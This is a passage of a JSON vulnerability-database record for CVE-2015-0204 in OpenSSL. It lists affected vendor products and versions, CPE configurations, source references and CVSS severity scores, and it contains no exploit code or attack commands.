0.3, "vendor": "ibm", "version": "6.3.0.6" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.023" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.15" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.3.0" }, { "model": "linux enterprise server", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "12" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.3" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "linux enterprise software development kit", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "12" }, { "model": "java sdk sr16-fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.33" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "db2 connect unlimited edition for system i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.2" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.14" }, { "model": "db2 connect unlimited edition for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.05" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.35" }, { "model": "telepresence sx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "bbm on ios", "scope": "ne", "trust": 0.3, "vendor": "blackberry", "version": "2.7.0.32" }, { "model": "tivoli storage flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.12" }, { "model": "websphere message broker", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.13" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.1.730" }, { "model": "os", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "1010.3.0.1052" }, { "model": "enterprise manager ops center", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "12.2.1" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.2" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "jdk update29", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.0.180" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "jre update9", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "datapower gateway", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.13" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "bbm protected on blackberry", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "100" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v50007.4.0.5" }, { "model": "chassis management module 2pet10q", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "websphere real time sr", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "39" }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.3" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.3" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "db2 connect application server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "network node manager ispi performance for traffic", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.1" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.09" }, { "model": "network node manager ispi for mpls vpn", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.1" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24089560" }, { "model": "java sdk sr8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.75" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.2" }, { "model": "tivoli asset management for it", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "cloudbridge", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.1.8" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "tivoli storage flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "java sdk sr10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "adaptive security appliance software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9.0(4.29)" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.3.0.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "rational software architect", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "tivoli workload scheduler distributed fp05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "java sdk sr4-fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1.0.6" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.6" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0.860" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.34" }, { "model": "chassis management module 2peo12e", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.12" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "jre update9", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0.90" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "java sdk 7r1 sr2-fp10", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.4" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1.00" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "domino fp if", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.152" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.10" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.2.1" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10" }, { "model": "systems insight manager sp6", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "cognos insight standard edition fp", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.24" }, { "model": "java sdk sr13-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.14" }, { "model": "telepresence server on multiparty media", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3104.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.016" }, { "model": "norman shark scada protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2" }, { "model": "aura application server sip core sp10", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53003.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "jdk 1.5.0 07-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "flashcopy manager for unix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.0" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "flashcopy manager for unix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1.2" }, { "model": "os", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "1.0" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "java sdk 6r1 sr8", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "mq light", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "cms r16", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "project openssl 0.9.8o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.6" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.12" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087520" }, { "model": "universal device service", "scope": "ne", "trust": 0.3, "vendor": "blackberry", "version": "0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.031" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.18" }, { "model": "xiv storage system gen2 10.2.4.e-6", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.35" }, { "model": "db2 connect unlimited edition for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "domino fp if", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.242" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.2" }, { "model": "network node manager ispi for ip multicast qa", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.5" }, { "model": "chassis management module 2pet10a", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "malware analyzer g2", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.1" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.841" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.2" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "cloud", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "0" }, { "model": "domino fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.13" }, { "model": "open systems snapvault", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.3" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.12" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.1" }, { "model": "rational developer for aix and cobol", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350078390" }, { "model": "jdk update22", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "flashcopy manager for oracle", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.0" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "87104.1" }, { "model": "jdk update15", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "db2 workgroup server edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1" }, { "model": "flashcopy manager for oracle", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.11" }, { "model": "ios 15.5 s", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.2" }, { "model": "prime performance manager for sps ppm sp1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.6" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "jre update4", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0.40" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "os", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "1010.3.0.1418" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.8" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.33" }, { "model": "flashcopy manager for custom applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.34" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.8" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.4" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.800" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.010" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.12" } ], "sources": [ { "db": "CERT/CC", "id": "VU#243585" }, { "db": "BID", "id": "71936" }, { "db": "JVNDB", "id": "JVNDB-2015-001672" }, { "db": "JVNDB", "id": "JVNDB-2015-001009" }, { "db": "CNNVD", "id": "CNNVD-201501-171" }, { "db": "NVD", "id": "CVE-2015-0204" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "0.9.8zc", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2015-0204" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "133318" }, { "db": "PACKETSTORM", "id": "133317" }, { "db": "PACKETSTORM", "id": "130987" }, { "db": "PACKETSTORM", "id": "131408" }, { "db": "PACKETSTORM", "id": "133325" }, { "db": "PACKETSTORM", "id": "130545" } ], "trust": 0.6 }, "cve": "CVE-2015-0204", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "impactScore": 2.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Medium", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "None", "baseScore": 4.3, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2015-0204", "impactScore": null, "integrityImpact": "Partial", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "IPA", "availabilityImpact": "None", "baseScore": 7.8, "confidentialityImpact": "Complete", "exploitabilityScore": null, "id": "JVNDB-2015-001672", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "High", "trust": 0.8, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2015-0204", "trust": 1.8, "value": "MEDIUM" }, { "author": "IPA", "id": "JVNDB-2015-001672", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201501-171", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULMON", "id": "CVE-2015-0204", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2015-0204" }, { "db": "JVNDB", "id": "JVNDB-2015-001672" }, { "db": "JVNDB", "id": "JVNDB-2015-001009" }, { "db": "CNNVD", "id": "CNNVD-201501-171" }, { "db": "NVD", "id": "CVE-2015-0204" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct 